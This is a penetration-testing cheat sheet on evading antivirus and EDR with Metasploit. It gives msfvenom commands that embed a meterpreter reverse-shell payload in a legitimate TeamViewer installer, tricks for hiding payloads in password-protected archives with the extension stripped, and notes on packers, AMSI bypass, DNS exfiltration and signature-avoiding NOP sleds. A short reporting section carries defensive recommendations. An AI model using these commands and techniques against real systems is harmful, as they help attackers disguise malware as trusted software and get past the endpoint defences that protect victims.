🛡️ Methodology Checklist
- Identify AV/EDR on target
- Use
evasionmodule type:use evasion/windows/windows_defender_exe - Combine with process injection payloads
- Obfuscate PowerShell:
Invoke-Obfuscationor manual string manipulation - Use staged payload to reduce initial footprint
- Test generated payload against target AV offline before deployment
- AMSI bypass in PowerShell if running PS-based stage
🎯 Operational Context
Use when: Standard MSF payloads are detected by EDR — use MSF evasion module or custom templates to reduce detection surface.
Think Dumber First: use evasion/windows/applocker_evasion_presentationhost and similar modules exist in MSF — run search evasion first. For real EDR bypass, combine MSF with Donut or manual PE injection.
Skip when: Simple payload works without evasion — don’t add complexity unnecessarily.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
msfvenom -p [PAYLOAD] LHOST=[TARGET_IP] LPORT=[PORT] -k -x [LEGIT].exe -e x86/shikata_ga_nai -a x86 --platform windows -o backdoor.exe -i 5 | Inject payload into legitimate exe (template + encoding) |
rar a [FILENAME].rar -p [FILENAME] | Create password-protected RAR archive |
mv [FILENAME].rar [FILENAME] | Remove extension to evade automated scanners |
wget [URL]/rarlinux-x64-612.tar.gz && tar -xzvf rarlinux-x64-612.tar.gz && cd rar | Install RAR on Linux |
msf-virustotal -k [API_KEY] -f [FILE].exe | Test payload against VirusTotal |
🔬 Deep Dive & Workflow
Defense Landscape — Know What You’re Bypassing
Endpoint Protection (Host-based):
- Software AV/EDR on the host itself (Avast, CrowdStrike, Defender)
- Combines AV + anti-malware + host firewall + anti-DDoS
Perimeter Protection (Network-based):
- Physical/virtual devices at network edge
- DMZ: buffer zone between internet and internal LAN
- IDS (detect) vs IPS (detect + block)
How Detection Works — Four Methods
| Method | How It Works | Bypass |
|---|---|---|
| Signature-based | Known attack pattern matching (byte signatures) | Encoding, custom shellcode, obfuscation |
| Heuristic/Anomaly | Deviations from behavior baseline | Blend with normal traffic, slow down |
| Stateful Protocol | Detects protocol anomalies vs RFC definitions | Use legit protocol wrappers |
| Live SOC monitoring | Human analyst with live feeds | Anti-forensics, timing, legitimate-looking traffic |
Executable Template Injection — Best Disk-Based Evasion
Embed malicious shellcode inside a signed, trusted binary. The binary’s valid signature and icon reduce suspicion:
msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 \
-k \ # separate thread → original app runs normally
-x ~/Downloads/TeamViewer_Setup.exe \
-e x86/shikata_ga_nai -a x86 --platform windows \
-o ~/Desktop/TeamViewer_Setup.exe -i 5-k is critical: without it, the original app crashes immediately, revealing the malware.
Archive Evasion — Bypassing Automated Scanners
AV engines often can’t scan inside password-protected archives:
# Install RAR on Kali
wget https://www.rarlab.com/rar/rarlinux-x64-612.tar.gz
tar -xzvf rarlinux-x64-612.tar.gz && cd rar
# Archive with password
rar a payload.rar -p payload.js # password = "payload.js"
# Remove extension (fools automated content-type scanners)
mv payload.rar payloadAdmin may still manually inspect. Use when bypassing automated email/web gateway scanners.
Packers — Compress + Obfuscate
Packers compress the executable and add a decompression stub that unpacks into memory at runtime. This changes the on-disk hash/signature:
- UPX — simple, widely supported, but well-known to AV
- Enigma Protector — stronger obfuscation, license required
- Themida — anti-debug, anti-VM, very strong
- MPRESS — free alternative to UPX
Network Evasion
- Meterpreter AES encryption — hides command content from network IDS/DPI; doesn’t hide that it’s C2 traffic
- DNS exfiltration — tunnel data inside DNS TXT records to bypass firewalls (inspired by Equifax breach)
- Port selection — use 80/443/53 to blend with normal traffic
Exploit Code Modification (Buffer Overflows)
To evade IDS signatures scanning for specific buffer patterns:
# Use randomized offsets in the module target definition
'Targets' => [
['Windows 2000 SP4 English', { 'Ret' => 0x77e14c29, 'Offset' => 5093 }],
],Avoid standard NOP sleds (\x90\x90\x90...) — heavily signatured. Use alternative NOP equivalents (\x41 = INC EAX, \x43 = INC EBX).
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| MSF evasion module not found | Wrong search terms | Run search type:evasion to list all evasion modules |
| Evasion module generates file but still detected | Behavioral detection | Evasion modules target static detection only; use process injection for behavioral bypass |
| Template EXE approach fails | Template binary flagged | Use a legitimate signed binary as template; check MS-signed binaries |
| AMSI bypass in payload fails | AMSI patched by Defender | Use reflective loader that patches AMSI in memory before payload execution |
| Payload detected after obfuscation | YARA rules on patterns | Change variable names, reorder operations, split shellcode array across multiple variables |
📝 Reporting Trigger
Finding Title: EDR Evasion Achieved via Payload Obfuscation and Custom Loading Impact: Advanced evasion techniques allow malicious payloads to execute on EDR-protected endpoints without triggering behavioral alerts, maintaining persistent access while evading incident response detection. Root Cause: EDR solution relies on known-bad signatures and limited behavioral heuristics. No memory forensics or process injection detection. Recommendation: Deploy EDR with memory scanning and process injection detection. Implement PowerShell Constrained Language Mode and AMSI. Ensure EDR telemetry is forwarded to SIEM for correlation.